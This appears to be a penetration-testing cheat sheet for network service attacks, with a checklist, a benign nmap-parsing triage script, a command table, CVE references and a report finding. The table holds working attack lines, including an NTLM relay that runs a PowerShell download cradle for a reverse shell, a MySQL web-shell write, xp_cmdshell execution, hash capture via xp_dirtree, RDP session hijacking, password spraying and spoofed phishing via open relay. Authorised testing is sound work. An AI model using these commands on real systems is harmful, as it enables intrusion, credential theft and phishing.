Methodology Checklist
- For each open service: banner grab → version → CVE research
- Test anonymous/null authentication first
- Try default credentials before brute-force
- Check for writable access (file upload, command exec)
- Capture/relay NTLM hashes where possible
- Document all service versions and vulnerabilities found
- Prioritise services providing direct code execution or credential access
Operational Context
Use when: quick reference for the service attack sequence, FTP to WinRM, ordered by protocol and attack type.
Think Dumber First: for each exposed port: 1) banner grab 2) anonymous/default creds 3) searchsploit the version 4) nmap vuln scripts. In that order, every time. Don't skip straight to CVE hunting without checking default creds first.
Skip when: N/A, reference document.
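The "dumber first" sequence above is mechanical enough to script. The following shell script is an added example, not part of the original page: it parses an `nmap -oN` report, and for every open port prints the four ordered checks with the page's own commands, then appends a CVE hint only when the banner satisfies one of the version conditions in the CVE Quick Reference (OpenSMTPD below 6.6.2, CoreFTP, SMB, RDP). The scan report embedded in `SAMPLE_SCAN` is constructed sample data for a hypothetical host, and the `[TARGET_IP]`/`[PASS]` placeholders follow the page's convention; nothing here touches the network.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): turn an `nmap -oN` report into the
# per-port "Think Dumber First" checklist and flag the CVE conditions listed in
# the page's CVE Quick Reference. SAMPLE_SCAN is constructed, not a real target.

# Constructed sample of `nmap -sV -oN` output for a hypothetical host.
SAMPLE_SCAN='Nmap scan report for 10.10.10.5
Host is up (0.020s latency).
PORT      STATE  SERVICE        VERSION
21/tcp    open   ftp            vsftpd 3.0.3
25/tcp    open   smtp           OpenSMTPD 6.6.1
139/tcp   open   netbios-ssn    Samba smbd 4
445/tcp   open   netbios-ssn    Samba smbd 4.9.5-Debian
1433/tcp  open   ms-sql-s       Microsoft SQL Server 2019
3389/tcp  open   ms-wbt-server  Microsoft Terminal Services
8080/tcp  closed http-proxy'

# Print "port<TAB>service<TAB>version" for every open TCP port in the report.
open_ports() {
    printf '%s\n' "$1" | awk '
        $1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
            port = $1; sub(/\/tcp$/, "", port)
            ver = ""
            for (i = 4; i <= NF; i++) ver = ver (i > 4 ? " " : "") $i
            print port "\t" $3 "\t" ver
        }'
}

# Dotted-version compare: exit 0 when $1 < $2 (6.6.1 < 6.6.2), 1 otherwise.
# Compares component by component so 6.10.0 sorts after 6.6.2.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        len = (n > m) ? n : m
        for (i = 1; i <= len; i++) {
            xi = (i <= n) ? x[i] + 0 : 0
            yi = (i <= m) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# Map a service/version pair to the CVE conditions in the page's table.
# Prints nothing when no listed condition matches the banner.
cve_hint() {
    svc="$1"; ver="$2"
    case "$svc" in
        smtp)
            v=$(printf '%s' "$ver" | sed -n 's/.*OpenSMTPD \([0-9][0-9.]*\).*/\1/p')
            if [ -n "$v" ] && version_lt "$v" 6.6.2; then
                echo "CVE-2020-7247: OpenSMTPD $v < 6.6.2, unauthenticated root RCE"
            fi ;;
        ftp)
            case "$ver" in
                *CoreFTP*) echo "CVE-2022-22836: CoreFTP, needs valid creds, arbitrary file write" ;;
            esac ;;
        netbios-ssn|microsoft-ds)
            # SMBGhost needs dialect 3.1.1; the banner does not show it, so check first.
            echo "CVE-2020-0796 (SMBGhost) only if SMB 3.1.1: nmap -p 445 --script smb-protocols [TARGET_IP]" ;;
        ms-wbt-server)
            echo "CVE-2019-0708 (BlueKeep): unauthenticated SYSTEM RCE on unpatched RDP, BSoD risk" ;;
    esac
}

# The ordered checks for one port. Step 2 (anonymous/default creds) is per service.
first_checks() {
    port="$1"; svc="$2"; ver="$3"
    echo "1) nc -nv [TARGET_IP] $port   # banner grab"
    case "$svc" in
        ftp)           echo "2) ftp [TARGET_IP]   # log in as anonymous, any password" ;;
        smtp)          echo "2) nmap -p$port --script smtp-open-relay [TARGET_IP]" ;;
        netbios-ssn|microsoft-ds)
                       echo "2) netexec smb [TARGET_IP] -u '' -p '' --shares   # null session" ;;
        ms-sql-s)      echo "2) mssqlclient.py sa@[TARGET_IP]   # default sa creds" ;;
        mysql)         echo "2) mysql -u root -h [TARGET_IP]   # root with no password" ;;
        ms-wbt-server) echo "2) crowbar -b rdp -s [TARGET_IP]/32 -U users.txt -c '[PASS]'" ;;
        *)             echo "2) try default credentials for $svc" ;;
    esac
    echo "3) searchsploit \"${ver:-$svc}\""
    echo "4) nmap -p$port --script vuln [TARGET_IP]"
    hint=$(cve_hint "$svc" "$ver")
    [ -n "$hint" ] && echo "!! $hint"
    return 0
}

# Walk every open port in the report and print its checklist.
triage() {
    open_ports "$1" | while IFS="$(printf '\t')" read -r port svc ver; do
        echo "== $port/tcp $svc $ver"
        first_checks "$port" "$svc" "$ver"
    done
}

triage "$SAMPLE_SCAN"
```

Replace `SAMPLE_SCAN` with `$(cat service_scan.txt)` to run it against the `-oN` file from the first cheatsheet row. The CVE hints deliberately stay conditional: a banner proves nothing for SMBGhost or BlueKeep, so the script points at the dialect/OS check rather than the exploit.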
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sudo nmap -sC -sV -p- --min-rate=1000 [TARGET_IP] -oN service_scan.txt | Full TCP port scan with version detection and default scripts |
| netexec smb [TARGET_IP] -u '' -p '' --shares | SMB null session share list |
| smbmap -H [TARGET_IP] -u null -r [SHARE] | SMBMap recursive listing of a share over a null session |
| ./enum4linux-ng.py [TARGET_IP] -A -C | Full SMB/RPC user + share enumeration |
| rpcclient -U '%' [TARGET_IP] | Manual RPC null session |
| netexec smb [SUBNET]/24 --gen-relay-list relay_targets.txt | List hosts where SMB signing is not required (relay targets) |
| nmap -Pn -sV -sC -p1433,3306 [TARGET_IP] | SQL service scan |
| dig mx [DOMAIN] \| grep "MX" \| grep -v ";" | Find mail servers |
| smtp-user-enum -M RCPT -U [USER_LIST] -D [DOMAIN] -t [TARGET_IP] | Enumerate SMTP users via RCPT TO |
| dig AXFR @[NAMESERVER_IP] [DOMAIN] | DNS zone transfer |
| ./subbrute.py [DOMAIN] -s [WORDLIST] -r resolvers.txt | Internal DNS subdomain brute-force |
| nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP] | SMBGhost check (third-party NSE script, not in the default nmap script set) |
| nmap -p3389 --script rd-vuln-bluekeep [TARGET_IP] | BlueKeep check (third-party NSE script, not in the default nmap script set) |
| nmap -p25 --script smtp-open-relay [TARGET_IP] | Open relay check |
| ftp [TARGET_IP], then log in as anonymous with any password | FTP anonymous login |
| curl -k -X PUT -H "Host: [TARGET_IP]" --basic -u [USER]:[PASS] --data-binary "PoC." --path-as-is https://[TARGET_IP]/../../../../../../whoops | CoreFTP CVE-2022-22836 (authenticated path traversal, arbitrary file write) |
| nmap -Pn -v -n -p 80 -b anonymous:password@[FTP_IP] [INTERNAL_IP] | FTP bounce attack: scan an internal host through the FTP server |
| sudo mount -t cifs -o username=[USER],password=[PASS],domain=. //[TARGET_IP]/[SHARE] /mnt/[MOUNT] | Mount SMB share on Linux |
| findstr /s /i cred n:\*.* | Recursively search a mapped share (here N:) for "cred" (Windows CMD) |
| impacket-psexec [USER]:[PASS]@[TARGET_IP] | SMB shell (PsExec, uploads a service binary) |
| impacket-smbexec [USER]:[PASS]@[TARGET_IP] | SMB shell (SMBExec, no binary dropped, stealthier) |
| impacket-ntlmrelayx --no-http-server -smb2support -t [TARGET_IP] -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://[LHOST]/shell.ps1\")"' | NTLM relay to a host without SMB signing, executing a PowerShell download cradle for a reverse shell |
| mssqlclient.py -p 1433 [USER]@[TARGET_IP] | Connect MSSQL (Impacket, SQL auth) |
| mssqlclient.py -windows-auth [DOMAIN]/[USER]:[PASS]@[TARGET_IP] | Connect MSSQL with Windows auth |
| mysql -u [USER] -p[PASS] -h [TARGET_IP] | Connect MySQL |
| EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'; | MSSQL: enable and execute xp_cmdshell (it is an advanced option, so 'show advanced options' must be enabled first; needs sysadmin) |
| EXEC master..xp_dirtree '\\[LHOST]\share\'; | MSSQL: force the SQL service account to authenticate to [LHOST] so its NetNTLM hash can be captured (Responder) or relayed |
| SELECT "<?php system($_GET['c']); ?>" INTO OUTFILE '/var/www/html/shell.php'; | MySQL: write web shell (needs the FILE privilege and secure_file_priv empty or covering the webroot) |
| python3 opensmtpd_exploit.py [TARGET_IP] 25 "[COMMAND]" | OpenSMTPD RCE (CVE-2020-7247) |
| crowbar -b rdp -s [TARGET_IP]/32 -U [USER_LIST] -c '[PASS]' | RDP password spray (Crowbar) |
| xfreerdp /v:[TARGET_IP] /u:[USER] /pth:[NT_HASH] | RDP Pass-the-Hash (only works if Restricted Admin mode is enabled on the target) |
| query user | List logged-on sessions and their IDs (on target) |
| sc.exe create sessionhijack binpath= "cmd.exe /k tscon [SESSION_ID] /dest:[OUR_SESSION]" && net start sessionhijack | RDP session hijack: tscon runs as SYSTEM via the service, attaching another user's session to ours without their password (needs local admin) |
| python3 o365spray.py --validate --domain [DOMAIN] | Check if domain uses O365 |
| python3 o365spray.py --spray -U users.txt -p '[PASS]' --count 1 --lockout 1 --domain [DOMAIN] | O365 password spray (one attempt per lockout window) |
| swaks --from [FROM] --to [TO] --body '[MSG]' --server [TARGET_IP] | Send email via open relay (spoofed phishing) |
Deep Dive & Workflow
Service-to-Attack Quick Reference
| Service | Port | First Checks | Key Attacks |
|---|---|---|---|
| FTP | 21 | Anonymous access, write perms | Upload web shell, bounce scan, CVE-2022-22836 |
| SMB | 139/445 | Null session, share listing | Relay, PsExec, session hijack via share |
| MSSQL | 1433 | Default sa creds, Windows auth | xp_cmdshell, xp_dirtree, impersonation, linked servers |
| MySQL | 3306 | root with no password | File read/write, web shell |
| RDP | 3389 | Spraying, PtH | Session hijack, BlueKeep |
| DNS | 53 | Zone transfer, subdomain enum | Spoofing, subdomain takeover |
| SMTP | 25 | User enum (VRFY/RCPT TO), open relay | Spoofed phishing, OpenSMTPD RCE |
CVE Quick Reference
| CVE | Service | Condition | Impact |
|---|---|---|---|
| CVE-2022-22836 | CoreFTP | Authenticated | Arbitrary file write |
| CVE-2020-0796 (SMBGhost) | SMB 3.1.1 | Unauthenticated | SYSTEM RCE (BSoD risk) |
| CVE-2019-0708 (BlueKeep) | RDP | Unauthenticated | SYSTEM RCE (BSoD risk) |
| CVE-2020-7247 | OpenSMTPD < 6.6.2 | Unauthenticated | Root RCE |
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Unsure which tool to use for service | Multiple options available | Prefer nxc for SMB/WinRM/LDAP; impacket for Kerberos/NTLM; nmap scripts for enumeration |
| Service responds but all auth fails | Protocol-specific auth issue | Verify: protocol version compatibility; try multiple auth methods (NTLM, Basic, Kerberos) |
| Cheat sheet command syntax outdated | Tool updates changed flags | Verify with --help; many tools (nxc vs cme) changed flag names in major versions |
| Port open but service unresponsive | SSL/TLS required | Try with TLS: append s to protocol or add --ssl flag; test with openssl s_client -connect [TARGET]:[PORT] |
| Multiple services on same port | Multiplex or redirect | Use nmap -sV to identify actual service; service may respond differently to protocol-specific probes |
Reporting Trigger
Finding Title: Multiple Exposed Services Present Broad Attack Surface
Impact: Multiple exposed network services (FTP, SMTP, SMB, SQL, RDP) each represent independent attack vectors. Compromise of any single service provides initial access for post-exploitation pivoting.
Root Cause: Insufficient network segmentation and unnecessary service exposure. Services enabled by default without assessing operational necessity.
Recommendation: Implement firewall rules limiting service exposure to required source networks. Disable all unnecessary services. Conduct regular network service audits. Apply defense-in-depth with authentication and authorization controls on each service.